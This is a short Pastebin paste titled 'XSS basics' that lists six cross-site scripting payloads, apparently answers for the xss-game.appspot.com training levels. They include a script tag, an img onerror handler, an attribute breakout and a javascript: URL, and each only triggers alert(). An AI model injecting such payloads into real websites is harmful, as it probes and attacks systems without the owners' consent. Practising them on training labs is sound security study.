Advertisement
bandors

XSS basics

Jan 29th, 2019
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. <script>alert('hello world')</script>
  2. <img src='aaaaaaa' onerror=alert("XSS")>
  3. frame#1' onerror="alert('yes');"
  4. https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("XSS")
  5.  
  6. ');alert('hello world
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement